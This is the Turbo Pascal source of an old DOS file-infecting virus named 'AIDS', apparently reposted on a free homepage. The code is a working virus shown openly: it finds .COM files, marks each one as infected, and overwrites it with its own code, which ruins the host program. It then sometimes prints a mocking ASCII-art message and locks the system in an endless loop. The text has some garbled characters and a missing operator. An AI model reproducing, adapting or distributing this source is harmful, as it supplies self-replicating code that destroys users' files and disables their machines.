{AIDS Although this is a primitive virus its effective. In this virus only the .COM files are infected. Its about 13K and it will change the date entry.} {C-} {U-} {I-} { Wont allow a user break, enable IO check } { -- Constants --------------------------------------- } Const VirusSize = 13847; { AIDS's code size } Warning :String[42] { Warning message } = 'This File Has Been Infected By AIDS! HaHa!'; { -- Type declarations------------------------------------- } Type DTARec =Record { Data area for file search } DOSnext :Array[1..21] of Byte; Attr : Byte; Ftime, FDate, FLsize, FHsize : Integer; FullName: Array[1..13] of Char; End; Registers = Record {Register set used for file search } Case Byte of 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); End; { -- Variables--------------------------------------------- } Var { Memory offset program code } ProgramStart : Byte absolute Cseg:$100; { Infected marker } MarkInfected : String[42] absolute Cseg:$180; Reg : Registers; { Register set } DTA : DTARec; { Data area } Buffer : Array[Byte] of Byte; { Data buffer } TestID : String[42]; { To recognize infected files } UsePath : String[66]; { Path to search files } { Lenght of search path } UsePathLenght: Byte absolute UsePath; Go : File; { File to infect } B : Byte; { Used } LoopVar : Integer; {Will loop forever} { -- Program code------------------------------------------ } Begin GetDir(0, UsePath); { get current directory } if Pos('\', UsePath) < UsePathLenght then UsePath := UsePath + '\'; UsePath := UsePath + '*.COM'; { Define search mask } Reg.AH := $1A; { Set data area } Reg.DS := Seg(DTA); Reg.DX := Ofs(DTA); MsDos(Reg); UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } Reg.AH := $4E; Reg.DS := Seg(UsePath); Reg.DX := Ofs(UsePath[1]); Reg.CX := $ff; { Set attribute to find ALL files } MsDos(Reg); { Find first matching entry } IF not Odd(Reg.Flags) Then { If a file found then } Repeat UsePath := DTA.FullName; B := Pos(#0, UsePath); If B 0 then Delete(UsePath, B, 255); { Remove garbage } Assign(Go, UsePath); Reset(Go); If IOresult = 0 Then { If not IO error then } Begin BlockRead(Go, Buffer, 2); Move(Buffer[$80], TestID, 43); { Test if file already ill(Infected) } If TestID < Warning Then { If not then ... } Begin Seek (Go, 0); { Mark file as infected and .. } MarkInfected := Warning; { Infect it } BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); Close(Go); Halt; {.. and halt the program } End; Close(Go); End; { The file has already been infected, search next. } Reg.AH := $4F; Reg.DS := Seg(DTA); Reg.DX := Ofs(DTA); MsDos(Reg); { ......................Until no more files are found } Until Odd(Reg.Flags); Loopvar:=Random(10); If Loopvar=7 then begin Writeln('_'); {Give a lot of smiles} Writeln('__'); Writeln(' '); Writeln(' ATTENTION: '); Writeln(' I have been elected to inform you that throughout your process of '); Writeln(' collecting and executing files, you have accidentally _H��K�_ '); Writeln(' yourself over; again, that''s PHUCKED yourself over. No, it cannot '); Writeln(' be; YES, it CAN be, a ���-s has infected your system. Now what do '); Writeln(' you have to say about that? HAHAHAHA. Have _H�¥ with this one and '); Writeln(' remember, there is NO cure for '); Writeln(' '); Writeln(' ���������� ������������ ����������� ���������� '); Writeln(' ���±±±±±±��� ±±±±��±±±±±± ��±±±±±±±��� ���±±±±±±±�� '); Writeln(' ��±± ��± ��± ��± ��± ��±± ±± '); Writeln(' ��± ��± ��± ��± ��± ��± '); Writeln(' ������������± ��± ��± ��± ������������ '); Writeln(' ��±±±±±±±±��± ��± ��± ��± ±±±±±±±±±��± '); Writeln(' ��± ��± ��± ��± ��± ��± '); Writeln(' ��± ��± ��± ��± ���± �� ���± '); Writeln(' ��± ��± ������������ �����������±± ����������±± '); Writeln(' ±± ±± ±±±±±±±±±±±± ±±±±±±±±±±± ±±±±±±±±±± '); Writeln(' '); Writeln(' '); REPEAT LOOPVAR:=0; UNTIL LOOPVAR=1; end; End. This page hosted by Get your own Free Homepage